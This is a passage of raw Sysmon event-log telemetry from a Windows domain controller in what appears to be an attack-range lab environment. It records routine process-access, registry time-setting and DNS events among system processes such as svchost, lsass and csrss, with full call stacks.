ll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:29.638{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:29.638{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00094a7a) 13241300x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:29.638{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea6c-0xc699fe49) 13241300x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:29.638{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea75-0x285e6649) 13241300x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:19:29.638{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea7d-0x8a22ce49) 22542200x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:26.862{08A6967A-4288-6000-1200-000000009A01}1232WIN-DC-2500fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.576{08A6967A-44E1-6000-2C01-000000009A01}51005116C:\Windows\system32\conhost.exe{08A6967A-44E1-6000-2B01-000000009A01}4568C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44E1-6000-2C01-000000009A01}5100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44E1-6000-2B01-000000009A01}4568C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-44E1-6000-2B01-000000009A01}4568C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-44E1-6000-2801-000000009A01}3088C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.560{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 